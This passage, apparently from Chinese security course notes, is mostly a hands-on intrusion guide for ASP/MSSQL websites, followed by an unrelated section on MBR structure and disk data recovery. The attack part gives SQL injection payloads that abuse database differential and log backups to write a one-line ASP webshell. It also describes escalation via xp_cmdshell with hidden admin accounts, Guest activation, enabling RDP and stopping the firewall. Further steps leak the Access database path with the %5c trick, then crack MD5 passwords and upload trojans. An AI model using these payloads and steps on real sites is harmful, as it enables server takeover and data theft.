份當(dāng)前數(shù)據(jù)庫(kù)execp_backupdb@bkpath='c:\',@bkfname='db_\DATE\_db.bak'--差異備份當(dāng)前數(shù)據(jù)庫(kù)execp_backupdb@bkpath='c:\',@bkfname='db_\DATE\_df.bak',@bktype='DF'--備份當(dāng)前數(shù)據(jù)庫(kù)日志execp_backupdb@bkpath='c:\',@bkfname='db_\DATE\_log.bak',@bktype='LOG'@dbnamesysname='',--要備份的數(shù)據(jù)庫(kù)名稱,不指定則備份當(dāng)前數(shù)據(jù)庫(kù)@bkpathnvarchar(260)='',--備份文件的存放目錄,不指定則使用SQL默認(rèn)的備份目錄@bkfnamenvarchar(260)='',--備份文件名,文件名中可以用\DBNAME\代表數(shù)據(jù)庫(kù)名,\DATE\代表日期,\TIME\代表時(shí)間@bktypenvarchar(10)='DB',--備份類型:'DB'備份數(shù)據(jù)庫(kù),'DF'差異備份,'LOG'日志備份@appendfilebit=1--追加/覆蓋備份文件（3）恢復(fù)數(shù)據(jù)庫(kù)/*示例--完整恢復(fù)數(shù)據(jù)庫(kù)execp_RestoreDb@bkfile='c:\db_20060624_db.bak',@dbname='db'--差異備份恢復(fù)execp_RestoreDb@bkfile='c:\db_20060624_db.bak'（4）差異備份差異備份的條件：①要有列目錄的權(quán)限(能列目錄當(dāng)然不能低于DB_owner)②HTTP500錯(cuò)誤不是自定義。③WEB和數(shù)據(jù)在一塊。還有的就是數(shù)據(jù)庫(kù)中不能存在%號(hào)之類的,不然也是不成功的。④數(shù)據(jù)量不能太大，太大了沒(méi)法在IE打開(kāi)。PS:列目錄這個(gè)權(quán)限可有可無(wú)，但是你得知道WEB路徑。差異備份的步驟：第一步：;declare@asysname,@svarchar(4000)select@a=db_name(),@s=0x庫(kù)名backupdatabase@atodisk=@s--備份當(dāng)前數(shù)據(jù)庫(kù),以差異備份.“0x庫(kù)名”這里備份的庫(kù)名轉(zhuǎn)換成16位進(jìn)制。PS:當(dāng)遇到字符型的注入點(diǎn)時(shí)要在；號(hào)前加一’號(hào),如：htttp:///list.asp?id=hack';declare@asysname,@svarchar(4000)select@a=db_name(),@s=0x庫(kù)名backupdatabase@atodisk=@s--第二步：;Droptable[xxx];createtable[dbo].[xxx]([cmd][image])--建表加字段第三步：insertintoxxx(cmd)values(0x一句話木馬)--寫入一句話木馬“0x一句話木馬”用一句話木馬的16位進(jìn)制代碼第四步：;declare@asysname,@svarchar(4000)select@a=db_name(),@s=0x備份路徑backupdatabase@atodisk=@sWITHDIFFERENTIAL,FORMAT--備份得到shell“0x備份路徑”這是備份的Web路徑的16位進(jìn)制編碼，也就是webshell的路徑假如備份的是F:\web\xxx.asp16進(jìn)制：0x463A5C7765625C6861636B35382E617370第五步：Droptable[表名]--刪除表PS:如果用一句話客戶端連不上分兩種情況：1.磁盤沒(méi)有寫的權(quán)限（找個(gè)有寫的權(quán)限的目錄重新備份，有可能成功）2.FSO被刪（5）Log備份條件①必需得知道Web目錄②Web和數(shù)據(jù)庫(kù)沒(méi)有分離步驟：第一步：;alterdatabase庫(kù)名setRECOVERYFULL--第二步：;createtablecmd(aimage)--第三步：;backuplog庫(kù)名todisk='c:\cmd'withinit--第四步：;insertintocmd(a)values(0x一句話木馬)--第五步：;backuplog庫(kù)名todisk='Web路徑\xxx.asp'--第六步：;droptablecmd--PS:如果是字符型，請(qǐng)一定在語(yǔ)句前加'4、SA權(quán)限的入侵思路（1）直接執(zhí)行命令提權(quán)得服務(wù)器如果xp_cmdshell沒(méi)有刪除㈠執(zhí)行命令探測(cè)相關(guān)信息㈡根據(jù)相關(guān)信息提升權(quán)限1.添加新用戶并提升為管理員（用戶名后加$，達(dá)到隱藏效果）2.激活Guest，并提升為管理員㈢查看終端服務(wù)（如果沒(méi)開(kāi)，我們可以嘗試開(kāi)33889）1.先查看端口，如果開(kāi)了3389,98%就是終端端口了2.如果沒(méi)開(kāi)3389,用Netstart查看開(kāi)沒(méi)有開(kāi)終端服務(wù)（TerminalService）。如果沒(méi)開(kāi)，嘗試開(kāi)啟。㈣連接3389,得服務(wù)器權(quán)限。如果連接失敗，最大的可能就是防火墻了，用Netstart命令查看服務(wù)，如發(fā)現(xiàn)有關(guān)防火墻的相關(guān)服務(wù)停掉相關(guān)服務(wù)。再連接。（2）通過(guò)木馬㈠通過(guò)列目錄找到Web目錄㈡上傳寫入一句話木馬㈢寫入小馬再寫大馬㈣成功得到Webshell用webshell上傳文件㈤權(quán)限提升5、%5c類暴庫(kù)①、原理%5c實(shí)際上是"\"的十六進(jìn)制代碼，也就是"\"的另一種表示法。但提交"\"和"%5c"卻會(huì)產(chǎn)生不同的結(jié)果，在ie中，我們把下面第一個(gè)地址中的"/"換成"\"提交：_blank>/soft\view.asp?id=58_blank>/soft%5cview.asp?id=58二者的訪問(wèn)結(jié)果是一樣的。ie會(huì)自動(dòng)把"\"轉(zhuǎn)變成"/"，從而訪問(wèn)到同一地址。但是，當(dāng)我們把"/"換成十六進(jìn)制寫法"%5c"時(shí)，ie不會(huì)對(duì)此進(jìn)行轉(zhuǎn)換。地址中的"%5c"被原樣提交了。當(dāng)ＩＩＳ收到后解析時(shí)，又會(huì)將%5c還原成"\"。在ＡＳＰ網(wǎng)頁(yè)中，凡調(diào)用數(shù)據(jù)庫(kù)時(shí)，都會(huì)用到一個(gè)連接數(shù)據(jù)庫(kù)的網(wǎng)頁(yè)conn.asp，它會(huì)創(chuàng)建一個(gè)數(shù)據(jù)庫(kù)連接對(duì)象，定義要調(diào)用的數(shù)據(jù)庫(kù)路徑一個(gè)典型的conn.asp如下：<%dimconndimdbpathsetconn=server.createobject("adodb.connection")DBPath=Server.MapPath("admin/xxx.mdb")conn.Open"driver={MicrosoftAccessDriver(*.mdb)};dbq="&DBPath%>大家注意第４句：DBPath=Server.MapPath("xxx.mdb")，Server.MapPath方法的作用是將網(wǎng)站中的相對(duì)路徑轉(zhuǎn)變成物理上的絕對(duì)路徑。因?yàn)檫B接數(shù)據(jù)庫(kù)時(shí)，須指明它的絕對(duì)路徑。比如：上面的網(wǎng)站中，網(wǎng)站：/的根目錄為："E:\web\"，下載目錄則在根目錄（E:\web\)內(nèi)的"soft"下，我們網(wǎng)站訪問(wèn)該站時(shí)，就是在訪問(wèn)E:\web\soft\目錄，而/soft/admin/，它只表明了admin與soft這個(gè)目錄的相對(duì)關(guān)系，把這個(gè)網(wǎng)站放在D:盤，也一樣不改變admin位于soft目錄下的關(guān)系。當(dāng)Server.MapPath方法將相對(duì)路徑轉(zhuǎn)為真實(shí)路徑時(shí)，它實(shí)際是三部分路徑加在一起得到真實(shí)路徑的：網(wǎng)頁(yè)目前執(zhí)行時(shí)所在的相對(duì)路徑，也就是從網(wǎng)站物理根目錄起的相對(duì)路徑，比如上面例子中conn.asp處在從根目錄起的"/soft/"下；然后調(diào)用的數(shù)據(jù)庫(kù)的相對(duì)路徑是admin/xxx.mdb，這樣就得到從根目錄起的完整相對(duì)路徑："/soft/admin/xxx.mdb"。比如上例中，網(wǎng)站根目錄所在的物理目錄為："E:\web"，Server.MapPath方法正是通過(guò)把"網(wǎng)站根目錄的物理地址＋完整的相對(duì)路徑"，從而得到真實(shí)的物理路徑。這樣，數(shù)據(jù)庫(kù)在硬盤上的物理路徑是：E:\web\soft\admin\xxx.mdb。當(dāng)我們提交_blank>/soft%5cview.asp?id=58時(shí)，view.asp調(diào)用conn.asp后，得到的網(wǎng)頁(yè)相對(duì)路徑是這樣的：/soft\（見(jiàn)上），再加上"admin/xxx.mdb"，就得到"/soft\"＋admin/xxx.mdb。在iis中，"/"和"\"代表著不同的意義，遇到了"\"時(shí)，認(rèn)為它已到了根目錄所在的物理路徑，不再往上解析（為何不再往上解析？后面還會(huì)分析的），于是網(wǎng)站的完整相對(duì)路徑變成了："admin/xxx.mdb"，再加上根目錄的物理路徑，得到的真實(shí)路徑變成："e:\web\admin\xxx.mdb"，而這個(gè)路徑是不存在的，數(shù)據(jù)庫(kù)連接當(dāng)然會(huì)失敗，于是ＩＩＳ會(huì)報(bào)錯(cuò)，并給出錯(cuò)誤原因：MicrosoftJETDatabaseEngine錯(cuò)誤'80004005''e:\web\admin\xxx.mdb'不是一個(gè)有效的路徑。確定路徑名稱拼寫是否正確，以及是否連接到文件存放的服務(wù)器。/soft/conn.asp，行12得到數(shù)據(jù)庫(kù)真正的存放位置admin\xxx.mdb，再提交/soft/admin/xxx.mdb即可下載數(shù)據(jù)庫(kù)。②、條件a、一般的錯(cuò)誤返回頁(yè)面是本地IE提供的,所以我們先得關(guān)了本地的錯(cuò)誤頁(yè)面,具體在菜單項(xiàng)的‘工具->internet選項(xiàng)->高級(jí)->顯示友好信息‘b、對(duì)方數(shù)據(jù)庫(kù)要是Access型。c、是數(shù)據(jù)庫(kù)連接中沒(méi)有加入容錯(cuò)代碼所以導(dǎo)致錯(cuò)誤不能跳過(guò)而活生生的把數(shù)據(jù)文件連接暴出來(lái)d、對(duì)方的IIS沒(méi)有關(guān)閉錯(cuò)誤提示,如果關(guān)了錯(cuò)誤提示就算你怎么暴也沒(méi)有用e、不一定要2級(jí)目錄但是肯定的是一級(jí)目錄是絕對(duì)不成功的③.尋找突破口（暴庫(kù)）1.下載數(shù)據(jù)庫(kù)2.破MD5密碼3.進(jìn)入后臺(tái)4.上傳木馬5.備份木馬成功得到Shell④.權(quán)限提升

磁盤數(shù)據(jù)恢復(fù)實(shí)驗(yàn)?zāi)康模荷钊肓私獯疟P數(shù)據(jù)存儲(chǔ)結(jié)構(gòu)；掌握磁盤數(shù)據(jù)恢復(fù)工具的使用。實(shí)驗(yàn)原理：

想恢復(fù)數(shù)據(jù)，必順先了解硬盤的存儲(chǔ)結(jié)構(gòu)，以便在恢復(fù)數(shù)據(jù)時(shí)對(duì)癥下藥。我們先了解一下數(shù)據(jù)結(jié)構(gòu)：下面是一個(gè)分了三個(gè)區(qū)的整個(gè)硬盤的數(shù)據(jù)結(jié)構(gòu)MBRC盤EBRD盤EBRE盤MBR，即主引導(dǎo)紀(jì)錄，位于整個(gè)硬盤的0柱面0磁道1扇區(qū)，共占用了63個(gè)扇區(qū)，但實(shí)際只使用了1個(gè)扇區(qū)（512字節(jié)）。在總共512字節(jié)的主引導(dǎo)記錄中，MBR又可分為三部分：第一部分：引導(dǎo)代碼，占用了446個(gè)字節(jié)；第二部分：分區(qū)表DPT，占用了64字節(jié)；第三部分：55AA，結(jié)束標(biāo)志，占用了2字節(jié)。后面我們要說(shuō)的用WinHex軟件來(lái)恢復(fù)誤分區(qū)，主要就是恢復(fù)第二部分：分區(qū)表。引導(dǎo)代碼的作用：就是讓硬盤具備可以引導(dǎo)的功能。如果引導(dǎo)代碼丟失，分區(qū)表還在，那么這個(gè)硬盤作為從盤所有分區(qū)數(shù)據(jù)都還在，只是這個(gè)硬盤自己不能夠用來(lái)啟動(dòng)進(jìn)系統(tǒng)了。所有pcOS的446B的引導(dǎo)區(qū)代碼是相同的，所以如果要恢復(fù)引導(dǎo)代碼，可直接copy，或用DOS下的命令：FDISK/MBR；這個(gè)命令只是用來(lái)恢復(fù)引導(dǎo)代碼，不會(huì)引起分區(qū)改變，丟失數(shù)據(jù)，另外，也可以用工具軟件，比如DISKGEN、WINHEX等。但分區(qū)表如果丟失，后果就是整個(gè)硬盤一個(gè)分區(qū)沒(méi)有，就好象剛買來(lái)一個(gè)新硬盤沒(méi)有分過(guò)區(qū)一樣。是很多病毒喜歡破壞的區(qū)域。EBR，也叫做擴(kuò)展MBR（ExtendedMBR）。因?yàn)橹饕龑?dǎo)記錄MBR最多只能描述4個(gè)分區(qū)表（每個(gè)分區(qū)表占16B），如果想要在一個(gè)硬盤上分多于4個(gè)區(qū)，就要采用擴(kuò)展MBR的辦法。MBR、EBR是分區(qū)產(chǎn)生的。比如MBR和EBR各都占用63個(gè)扇區(qū)